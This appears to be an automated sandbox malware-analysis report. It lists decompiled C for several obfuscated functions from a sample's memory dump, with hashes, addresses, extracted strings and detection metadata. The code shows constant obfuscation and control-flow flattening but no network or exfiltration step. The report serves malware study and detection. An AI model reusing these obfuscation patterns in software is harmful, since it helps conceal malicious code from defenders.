Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: <;M
API String ID: 0-164005337
Opcode ID: 1822a3d228f0f012d1e79572e9350ea740ad275d9e999749d05818e11ca25c3b
Instruction ID: fac807720a9274d4fd97dbd6945d0a34212137d2ef6fc701a27d44b24c0b2296
Opcode Fuzzy Hash: 1822a3d228f0f012d1e79572e9350ea740ad275d9e999749d05818e11ca25c3b
Instruction Fuzzy Hash: 92917871D01219EBCB18CFA5D98A9EEBBB1FF44314F20805AE512BB250C7B41A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02B31F38, Relevance: 1.4, Strings: 1, Instructions: 134
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E02B31F38(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				char _v556;
				intOrPtr _v564;
				char _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				void* _t89;
				signed int _t97;
				intOrPtr _t102;
				signed int _t104;
				char* _t105;
				void* _t119;
				signed int* _t125;

				_push(E02B3E5C0);
				_push(_a4);
				_t102 = __ecx;
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t89);
				_v588 = 0xa9001c;
				_t125 =  &(( &_v624)[4]);
				_v588 = _v588 + 0xfffff841;
				_v588 = _v588 ^ 0x00a8f85f;
				_t119 = 0x7750dec;
				_v596 = 0x801276;
				_v596 = _v596 << 8;
				_v596 = _v596 ^ 0x801c5a8c;
				_v592 = 0xe5da65;
				_v592 = _v592 | 0x8d0ca196;
				_v592 = _v592 ^ 0x8de55992;
				_v612 = 0x74ea46;
				_v612 = _v612 >> 6;
				_v612 = _v612 | 0x4c0dce94;
				_v612 = _v612 ^ 0x4c0245c2;
				_v604 = 0x7f8ae0;
				_t104 = 0x6f;
				_v604 = _v604 / _t104;
				_v604 = _v604 + 0x431c;
				_v604 = _v604 ^ 0x0002d2ab;
				_v608 = 0x66ed0;
				_v608 = _v608 >> 5;
				_v608 = _v608 * 0x5a;
				_v608 = _v608 ^ 0x001395e3;
				_v620 = 0x99715e;
				_v620 = _v620 + 0xffff5a71;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0xbf19;
				_v620 = _v620 ^ 0xcbc1aabc;
				_v624 = 0x2a4f9d;
				_v624 = _v624 | 0x7ed7085f;
				_v624 = _v624 + 0xffff4297;
				_v624 = _v624 | 0x5a00af06;
				_v624 = _v624 ^ 0x7efc78c9;
				_v600 = 0xb3c9ce;
				_v600 = _v600 + 0xffff4f2d;
				_v600 = _v600 ^ 0x00b0dce6;
				_t118 = _v600;
				_v616 = 0x17dc9d;
				_v616 = _v616 ^ 0xb350768a;
				_v616 = _v616 + 0xffff5841;
				_v616 = _v616 ^ 0xb3483330;
				do {
					while(_t119 != 0x26f316f) {
						if(_t119 == 0x4832572) {
							_v556 = 0x22c;
							_t105 =  &_v556;
							_t97 = E02B3BD23(_t105, _t118, _v612, _v604, _v608);
							_t125 =  &(_t125[3]);
							L12:
							asm("sbb esi, esi");
							_t119 = ( ~_t97 & 0xf2b580e0) + 0xfb9b08f;
							continue;
						}
						if(_t119 == 0x7750dec) {
							_v564 = _t102;
							_t119 = 0xecc24d5;
							continue;
						}
						if(_t119 == 0x88070fd) {
							_t97 = E02B506EC(_v620, _t118, _v624,  &_v556);
							_pop(_t105);
							goto L12;
						}
						if(_t119 != 0xecc24d5) {
							if(_t119 == 0xfb9b08f) {
								return E02B51538(_v600, _v616, _t118);
							}
							goto L18;
						}
						_push(_t105);
						_t97 = E02B37603(_v588);
						_t118 = _t97;
						_t105 = _t105;
						__eflags = _t97 - 0xffffffff;
						if(__eflags != 0) {
							_t119 = 0x4832572;
							continue;
						}
						L8:
						return _t97;
					}
					__eflags = E02B3E5C0(__eflags,  &_v556,  &_v584);
					if(__eflags == 0) {
						_t119 = 0xfb9b08f;
						goto L18;
					} else {
						_t119 = 0x88070fd;
						continue;
					}
					goto L8;
					L18:
					__eflags = _t119 - 0x5c72449;
				} while (__eflags != 0);
				return _t97;
			}

0x02b31f42
0x02b31f47
0x02b31f4e
0x02b31f50
0x02b31f51
0x02b31f52
0x02b31f57
0x02b31f5f
0x02b31f62
0x02b31f6c
0x02b31f74
0x02b31f79
0x02b31f86
0x02b31f8b
0x02b31f93
0x02b31f9b
0x02b31fa3
0x02b31fab
0x02b31fb3
0x02b31fb8
0x02b31fc0
0x02b31fc8
0x02b31fd6
0x02b31fd9
0x02b31fdd
0x02b31fe5
0x02b31fed
0x02b31ff5
0x02b31fff
0x02b32003
0x02b3200b
0x02b32013
0x02b3201b
0x02b32020
0x02b32028
0x02b32030
0x02b32038
0x02b32040
0x02b32048
0x02b32050
0x02b32058
0x02b32060
0x02b32068
0x02b32070
0x02b32074
0x02b3207c
0x02b32084
0x02b3208c
0x02b32094
0x02b32094
0x02b320a6
0x02b32146
0x02b32152
0x02b3215a
0x02b3215f
0x02b3211f
0x02b32123
0x02b3212b
0x00000000
0x02b3212b
0x02b320b2
0x02b32132
0x02b32136
0x00000000
0x02b32136
0x02b320ba
0x02b32118
0x02b3211e
0x00000000
0x02b3211e
0x02b320c2
0x02b320c6
0x00000000
0x02b320da
0x00000000
0x02b320c6
0x02b320ee
0x02b320f4
0x02b320f9
0x02b320fc
0x02b320fd
0x02b32100
0x02b32102
0x00000000
0x02b32102
0x02b320e5
0x02b320e5
0x02b320e5
0x02b32173
0x02b32175
0x02b32181
0x00000000
0x02b32177
0x02b32177
0x00000000
0x02b32177
0x00000000
0x02b32183
0x02b32183
0x02b32183
0x00000000

Strings

Ft, xrefs: 02B31FAB

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ft
API String ID: 0-1468847975
Opcode ID: 5ce94a89e2a82fb3d0ce77328ffbaef4d4e813d812d7dff7c82494ba253c5d1a
Instruction ID: d5ae653920253ce4a5134c4ea034551a83e5c984f6382b008324fca4471a95ff
Opcode Fuzzy Hash: 5ce94a89e2a82fb3d0ce77328ffbaef4d4e813d812d7dff7c82494ba253c5d1a
Instruction Fuzzy Hash: 9F51897280C3018BC359DF24D88541BBBE1FB88728F044A5DF99AA6260D7B1CE49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 02B4E1F8, Relevance: 1.4, Strings: 1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E02B4E1F8(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t64;
				signed int _t73;
				short* _t92;
				signed int _t93;
				signed int _t99;
				unsigned int _t100;
				unsigned int _t101;
				signed int _t110;
				short* _t111;
				signed int* _t112;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				unsigned int _t118;
				void* _t124;
				short _t126;
				void* _t128;
				void* _t130;

				_push( *(_t128 + 0x30));
				_push( *(_t128 + 0x30));
				_push( *(_t128 + 0x30));
				_push(__ecx);
				E02B4FE29(_t64);
				 *(_t128 + 0x28) = 0xaa6cff;
				_t112 =  &(__ecx[1]);
				 *(_t128 + 0x28) =  *(_t128 + 0x28) + 0x5a3e;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) << 0xc;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0xac7afad8;
				 *(_t128 + 0x24) = 0xf23620;
				_t114 = 0x4f;
				 *(_t128 + 0x28) =  *(_t128 + 0x24) / _t114;
				_t115 = 0x1d;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) / _t115;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0x0000f47a;
				 *(_t128 + 0x24) = 0x6765f0;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) | 0x7b5bc89c;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) >> 1;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) ^ 0x3db51d28;
				 *(_t128 + 0x30) = 0xe89ec2;
				_t116 = 0x26;
				 *(_t128 + 0x2c) =  *(_t128 + 0x30) / _t116;
				 *(_t128 + 0x2c) =  *(_t128 + 0x2c) ^ 0x00078a4c;
				_t110 =  *__ecx;
				_t113 =  &(_t112[1]);
				_t73 =  *_t112 ^ _t110;
				 *(_t128 + 0x30) = _t110;
				 *(_t128 + 0x34) = _t73;
				_t118 =  !=  ? (_t73 + 0x00000001 & 0xfffffffc) + 4 : _t73 + 1;
				_t92 = E02B3C5D8(_t118 + _t118);
				_t130 = _t128 + 0x18;
				 *((intOrPtr*)(_t130 + 0x18)) = _t92;
				if(_t92 != 0) {
					_t126 = 0;
					_t111 = _t92;
					_t124 =  >  ? 0 :  &(_t113[_t118 >> 2]) - _t113 + 3 >> 2;
					if(_t124 != 0) {
						_t93 =  *(_t130 + 0x20);
						do {
							_t99 =  *_t113;
							_t113 =  &(_t113[1]);
							_t100 = _t99 ^ _t93;
							 *_t111 = _t100 & 0x000000ff;
							_t111 = _t111 + 8;
							 *((short*)(_t111 - 6)) = _t100 >> 0x00000008 & 0x000000ff;
							_t101 = _t100 >> 0x10;
							_t126 = _t126 + 1;
							 *((short*)(_t111 - 4)) = _t101 & 0x000000ff;
							 *((short*)(_t111 - 2)) = _t101 >> 0x00000008 & 0x000000ff;
						} while (_t126 < _t124);
						_t92 =  *((intOrPtr*)(_t130 + 0x1c));
					}
					 *((short*)(_t92 +  *(_t130 + 0x24) * 2)) = 0;
				}
				return _t92;
			}

0x02b4e1fe
0x02b4e202
0x02b4e206
0x02b4e20b
0x02b4e20c
0x02b4e211
0x02b4e219
0x02b4e21c
0x02b4e226
0x02b4e22b
0x02b4e233
0x02b4e241
0x02b4e246
0x02b4e250
0x02b4e255
0x02b4e25b
0x02b4e263
0x02b4e26b
0x02b4e273
0x02b4e277
0x02b4e27f
0x02b4e28b
0x02b4e28e
0x02b4e292
0x02b4e29a
0x02b4e29e
0x02b4e2a1
0x02b4e2a3
0x02b4e2a7
0x02b4e2bb
0x02b4e2da
0x02b4e2dc
0x02b4e2df
0x02b4e2e5
0x02b4e2ed
0x02b4e2ef
0x02b4e300
0x02b4e305
0x02b4e307
0x02b4e30b
0x02b4e30b
0x02b4e30d
0x02b4e310
0x02b4e315
0x02b4e31d
0x02b4e323
0x02b4e327
0x02b4e330
0x02b4e331
0x02b4e338
0x02b4e33c
0x02b4e340
0x02b4e340
0x02b4e34b
0x02b4e34b
0x02b4e357

Strings

>Z, xrefs: 02B4E21C

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: >Z
API String ID: 0-2342695272
Opcode ID: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction ID: e7af61ecc0d93d0d2f65519263a8cbb07232d62041edd5f3f7e4649f3632eefd
Opcode Fuzzy Hash: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction Fuzzy Hash: 7541B2726183119BC304DF29C48585BFBE1FFC8718F494A6EF889A7250D774D905CB86

Uniqueness

Uniqueness Score: -1.00%

Function 02B355FF, Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E02B355FF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t75;
				void* _t84;
				signed int _t88;
				signed int _t89;
				void* _t92;
				intOrPtr _t109;
				signed int* _t112;

				_t108 = _a12;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t75);
				_v68 = 0x7ffd4d;
				_t109 = 0;
				_v64 = 0;
				_t112 =  &(( &_v96)[5]);
				_v80 = 0x808dec;
				_v80 = _v80 << 7;
				_t92 = 0x1c7cd09;
				_t88 = 0x24;
				_v80 = _v80 * 0x7a;
				_v80 = _v80 ^ 0xa1de2a47;
				_v84 = 0x460263;
				_v84 = _v84 + 0xffffc38b;
				_v84 = _v84 + 0xffffb2e6;
				_v84 = _v84 ^ 0x0042c6ce;
				_v88 = 0x2af47a;
				_v88 = _v88 + 0xfffff2b2;
				_v88 = _v88 ^ 0xf3d8a894;
				_v88 = _v88 ^ 0xf3ffbcf7;
				_v92 = 0xf8385b;
				_v92 = _v92 / _t88;
				_v92 = _v92 + 0xffff302a;
				_v92 = _v92 ^ 0x00085c4c;
				_v96 = 0xec2811;
				_t89 = 0x6c;
				_v96 = _v96 / _t89;
				_v96 = _v96 | 0xeb0c0969;
				_v96 = _v96 ^ 0x646fa875;
				_v96 = _v96 ^ 0x8f64cfef;
				_v72 = 0x6e85b8;
				_v72 = _v72 + 0x990a;
				_v72 = _v72 + 0xffff81c6;
				_v72 = _v72 ^ 0x00684c5c;
				_v76 = 0xd1f521;
				_v76 = _v76 | 0xdf7ffbcd;
				_v76 = _v76 ^ 0xdff37ac7;
				do {
					while(_t92 != 0x19e170b) {
						if(_t92 == 0x1c7cd09) {
							_t92 = 0x19e170b;
							continue;
						} else {
							if(_t92 == 0x305f804) {
								_t84 = E02B52BF0(_v88,  &_v60, _v92, _v96, _t108);
								_t112 =  &(_t112[3]);
								__eflags = _t84;
								if(__eflags != 0) {
									_t92 = 0xecd5788;
									continue;
								}
							} else {
								_t117 = _t92 - 0xecd5788;
								if(_t92 != 0xecd5788) {
									goto L11;
								} else {
									E02B49D3E( &_v60, _v72, _t117, _v76, _t108 + 0x24);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E02B322A6(_a8, _v80,  &_v60, _v84);
					_t112 =  &(_t112[2]);
					_t92 = 0x305f804;
					L11:
					__eflags = _t92 - 0xfbce5f5;
				} while (__eflags != 0);
				goto L6;
			}

0x02b35606
0x02b3560a
0x02b3560b
0x02b3560f
0x02b35613
0x02b35614
0x02b35615
0x02b3561a
0x02b35622
0x02b35624
0x02b35628
0x02b3562b
0x02b35635
0x02b3563a
0x02b3564b
0x02b3564e
0x02b35652
0x02b3565a
0x02b35662
0x02b3566a
0x02b35672
0x02b3567a
0x02b35682
0x02b3568a
0x02b35692
0x02b3569a
0x02b356aa
0x02b356ae
0x02b356b6
0x02b356be
0x02b356ca
0x02b356d2
0x02b356d6
0x02b356de
0x02b356e6
0x02b356ee
0x02b356f6
0x02b356fe
0x02b35706
0x02b3570e
0x02b35716
0x02b3571e
0x02b35726
0x02b35726
0x02b35730
0x02b35788
0x00000000
0x02b35732
0x02b35738
0x02b35778
0x02b3577d
0x02b35780
0x02b35782
0x02b35784
0x00000000
0x02b35784
0x02b3573a
0x02b3573a
0x02b3573c
0x00000000
0x02b3573e
0x02b3574e
0x02b3575a
0x02b3575a
0x02b3573c
0x02b35738
0x02b3575e
0x02b35766
0x02b35766
0x02b3579d
0x02b357a2
0x02b357a5
0x02b357aa
0x02b357aa
0x02b357aa
0x00000000

Strings

\Lh, xrefs: 02B35706

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: \Lh
API String ID: 0-2235754405
Opcode ID: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction ID: 6670bebb8fdbfae860e0cc2a1c26c665fb1dbcc8b2fe9779d39262c17d6ac5f3
Opcode Fuzzy Hash: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction Fuzzy Hash: 26419871208342CFC769CE20D88482BBBE5FFD8308F104A5DF5A592260EB75DA09CB86

Uniqueness

Uniqueness Score: -1.00%

Function 02B3E640, Relevance: 1.4, Strings: 1, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E02B3E640(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t68;
				void* _t78;
				signed int _t79;
				void* _t82;
				void* _t97;
				signed int* _t100;

				_t96 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t68);
				_v68 = 0x77f17d;
				_t100 =  &(( &_v88)[4]);
				_v68 = _v68 + 0xffffbc47;
				_v68 = _v68 ^ 0x007a21f6;
				_t97 = 0;
				_v76 = 0xd01664;
				_t82 = 0xf37e824;
				_t79 = 0x2a;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0xc6ac;
				_v76 = _v76 ^ 0x63f53bf0;
				_v84 = 0xca0bb3;
				_v84 = _v84 | 0xec4cd5b6;
				_v84 = _v84 ^ 0xa5b6880a;
				_v84 = _v84 + 0x809e;
				_v84 = _v84 ^ 0x497d3a42;
				_v72 = 0x505b1c;
				_v72 = _v72 | 0xf2745011;
				_v72 = _v72 ^ 0xf27af575;
				_v88 = 0x8ba087;
				_v88 = _v88 + 0x570e;
				_v88 = _v88 + 0xffffc480;
				_v88 = _v88 >> 5;
				_v88 = _v88 ^ 0x00062f0c;
				_v64 = 0x507489;
				_v64 = _v64 + 0x50d6;
				_v64 = _v64 ^ 0x0059b1d9;
				_v80 = 0x3c915f;
				_v80 = _v80 + 0xba86;
				_v80 = _v80 / _t79;
				_v80 = _v80 + 0x3cb0;
				_v80 = _v80 ^ 0x00080f7c;
				do {
					while(_t82 != 0x5422f69) {
						if(_t82 == 0xc053a7e) {
							__eflags = E02B49D3E( &_v60, _v64, __eflags, _v80, _t96 + 4);
							_t97 =  !=  ? 1 : _t97;
						} else {
							if(_t82 == 0xe18d46d) {
								_t78 = E02B52BF0(_v84,  &_v60, _v72, _v88, _t96);
								_t100 =  &(_t100[3]);
								__eflags = _t78;
								if(__eflags != 0) {
									_t82 = 0xc053a7e;
									continue;
								}
							} else {
								if(_t82 != 0xf37e824) {
									goto L9;
								} else {
									_t82 = 0x5422f69;
									continue;
								}
							}
						}
						L12:
						return _t97;
					}
					E02B322A6(_a4, _v68,  &_v60, _v76);
					_t100 =  &(_t100[2]);
					_t82 = 0xe18d46d;
					L9:
					__eflags = _t82 - 0xc897eb;
				} while (__eflags != 0);
				goto L12;
			}

0x02b3e647
0x02b3e64b
0x02b3e64c
0x02b3e650
0x02b3e651
0x02b3e652
0x02b3e657
0x02b3e65f
0x02b3e662
0x02b3e66c
0x02b3e674
0x02b3e676
0x02b3e67e
0x02b3e68f
0x02b3e690
0x02b3e694
0x02b3e69c
0x02b3e6a4
0x02b3e6ac
0x02b3e6b4
0x02b3e6bc
0x02b3e6c4
0x02b3e6cc
0x02b3e6d4
0x02b3e6dc
0x02b3e6e4
0x02b3e6ec
0x02b3e6f4
0x02b3e6fc
0x02b3e701
0x02b3e709
0x02b3e711
0x02b3e719
0x02b3e721
0x02b3e729
0x02b3e73c
0x02b3e740
0x02b3e748
0x02b3e750
0x02b3e750
0x02b3e756
0x02b3e7cf
0x02b3e7d1
0x02b3e758
0x02b3e75e
0x02b3e77d
0x02b3e782
0x02b3e785
0x02b3e787
0x02b3e789
0x00000000
0x02b3e789
0x02b3e760
0x02b3e766
0x00000000
0x02b3e768
0x02b3e768
0x00000000
0x02b3e768
0x02b3e766
0x02b3e75e
0x02b3e7d5
0x02b3e7dd
0x02b3e7dd
0x02b3e79e
0x02b3e7a3
0x02b3e7a6
0x02b3e7ab
0x02b3e7ab
0x02b3e7ab
0x00000000

Strings

B:}I, xrefs: 02B3E6C4

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: B:}I
API String ID: 0-2889142627
Opcode ID: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction ID: 3e5455b2d0fbaec70bcddb92a98693f94ea301da15617a989d9a4fd4872611fe
Opcode Fuzzy Hash: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction Fuzzy Hash: B3418971508342DBD758CE21E98582BBBE5FFC4758F00091EF681922A0D775DA098F93

Uniqueness

Uniqueness Score: -1.00%

Function 02B40ABA, Relevance: 1.3, Strings: 1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E02B40ABA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _t98;
				signed int _t104;
				signed int _t105;
				intOrPtr _t116;

				_push(0x104);
				_push(_a16);
				_v44 = 0x104;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(0x104);
				_v56 = 0x2049f9;
				_t116 = 0;
				_v52 = 0;
				_v48 = 0;
				_v20 = 0xeb153a;
				_v20 = _v20 | 0xe521a998;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x000387ae;
				_v32 = 0xc4823f;
				_v32 = _v32 + 0xd346;
				_v32 = _v32 ^ 0x00c87855;
				_v28 = 0x319d41;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x000ba15b;
				_v16 = 0x4743d7;
				_t104 = 0x54;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0xf604c8f9;
				_v16 = _v16 ^ 0xf6068564;
				_v24 = 0x18550b;
				_v24 = _v24 ^ 0x1069247b;
				_t105 = 5;
				_v24 = _v24 / _t105;
				_v24 = _v24 ^ 0x03437d28;
				_v36 = 0xafe78e;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xafe5259b;
				_v8 = 0xc66a38;
				_v8 = _v8 ^ 0x50a68901;
				_v8 = _v8 ^ 0x40045619;
				_v8 = _v8 * 0x15;
				_v8 = _v8 ^ 0x584c57e2;
				_v12 = 0xdb79dc;
				_v12 = _v12 << 0xa;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x1655447b;
				_v12 = _v12 ^ 0x796b06cf;
				_v40 = 0x1393c;
				_v40 = _v40 + 0x9e03;
				_v40 = _v40 ^ 0x000e16cd;
				_t98 = E02B4F790(_t105, _a12, _v20);
				_t115 = _t98;
				if(_t98 != 0) {
					_t116 = E02B3DAAA(_t115, _v24, _v36, _a8, _v8, _t105,  &_v44);
					E02B51538(_v12, _v40, _t115);
				}
				return _t116;
			}

0x02b40ac7
0x02b40ac8
0x02b40acb
0x02b40ace
0x02b40ad1
0x02b40ad4
0x02b40ad7
0x02b40ad8
0x02b40ad9
0x02b40ade
0x02b40ae5
0x02b40ae7
0x02b40aec
0x02b40aef
0x02b40af6
0x02b40afd
0x02b40b01
0x02b40b08
0x02b40b0f
0x02b40b16
0x02b40b1d
0x02b40b24
0x02b40b28
0x02b40b2f
0x02b40b3b
0x02b40b40
0x02b40b45
0x02b40b4c
0x02b40b53
0x02b40b5a
0x02b40b64
0x02b40b6a
0x02b40b6d
0x02b40b74
0x02b40b7b
0x02b40b7f
0x02b40b86
0x02b40b8d
0x02b40b94
0x02b40b9f
0x02b40ba2
0x02b40ba9
0x02b40bb0
0x02b40bb4
0x02b40bb8
0x02b40bbf
0x02b40bc6
0x02b40bcd
0x02b40bd4
0x02b40beb
0x02b40bf0
0x02b40bf7
0x02b40c14
0x02b40c1a
0x02b40c1f
0x02b40c29

Strings

WLX, xrefs: 02B40BA2

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: WLX
API String ID: 0-2077286540
Opcode ID: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
Instruction ID: a29c3c9d0542d8698bcfcd08a1bfaad86febfcb24455fc954913066ec7d6c08f
Opcode Fuzzy Hash: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
Instruction Fuzzy Hash: FD41E2B1D0120DEBCF05DFA5D94A8EEBBB6FB48314F208189E916B7210D3B54A55DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B37078, Relevance: 1.3, Strings: 1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E02B37078(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t109;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				void* _t132;
				void* _t133;
				signed int _t134;

				_v12 = 0x8f98c8;
				_v12 = _v12 >> 1;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x6b25fb67;
				_v12 = _v12 ^ 0xa7412f1a;
				_v8 = 0xcf53a8;
				_v8 = _v8 + 0xffff4190;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xcc79c588;
				_v8 = _v8 ^ 0xffd9b9f8;
				_v32 = 0xdc21b3;
				_t133 = __ecx;
				_t113 = 0x53;
				_v32 = _v32 / _t113;
				_v32 = _v32 ^ 0x0002aeef;
				_v20 = 0xa54b66;
				_t114 = 0x25;
				_v20 = _v20 / _t114;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x00488e30;
				_v28 = 0xf9718f;
				_v28 = _v28 | 0xd1e9f83c;
				_v28 = _v28 + 0xbce;
				_v28 = _v28 ^ 0xd1f9aa01;
				_v16 = 0x596927;
				_t115 = 0x70;
				_v16 = _v16 / _t115;
				_t116 = 0x65;
				_v16 = _v16 / _t116;
				_t117 = 0x1e;
				_v16 = _v16 / _t117;
				_v16 = _v16 ^ 0x0002780a;
				_v24 = 0x48f141;
				_v24 = _v24 << 0xe;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x1e282004;
				_v36 = 0x9232a3;
				_t118 = 0x42;
				_push(_t118);
				_v36 = _v36 / _t118;
				_v36 = _v36 ^ 0x00023701;
				_push(_t118);
				_t109 = E02B4CCA0(_v24, _v36);
				_push(_t133);
				_t134 = _t109;
				_push(_t134);
				_push(_v16);
				_t132 = 3;
				E02B3E404(_v28, _t132);
				 *((short*)(_t133 + _t134 * 2)) = 0;
				return 0;
			}

0x02b3707e
0x02b37087
0x02b3708a
0x02b3708e
0x02b37095
0x02b3709c
0x02b370a3
0x02b370aa
0x02b370ae
0x02b370b5
0x02b370bc
0x02b370ca
0x02b370cc
0x02b370d1
0x02b370d6
0x02b370dd
0x02b370e7
0x02b370ec
0x02b370f1
0x02b370f5
0x02b370fc
0x02b37103
0x02b3710a
0x02b37111
0x02b37118
0x02b37122
0x02b37127
0x02b3712f
0x02b37134
0x02b3713c
0x02b37141
0x02b37146
0x02b3714d
0x02b37154
0x02b37158
0x02b3715b
0x02b37162
0x02b3716c
0x02b3716f
0x02b37170
0x02b37173
0x02b37186
0x02b3718d
0x02b37192
0x02b37193
0x02b37195
0x02b37196
0x02b3719b
0x02b3719f
0x02b371a9
0x02b371b2

Strings

'iY, xrefs: 02B37118

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'iY
API String ID: 0-1691070665
Opcode ID: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction ID: 508502f54c142008b08d8ba466d3c6bd7bd1fca18d140440bc2a4a240bfb905d
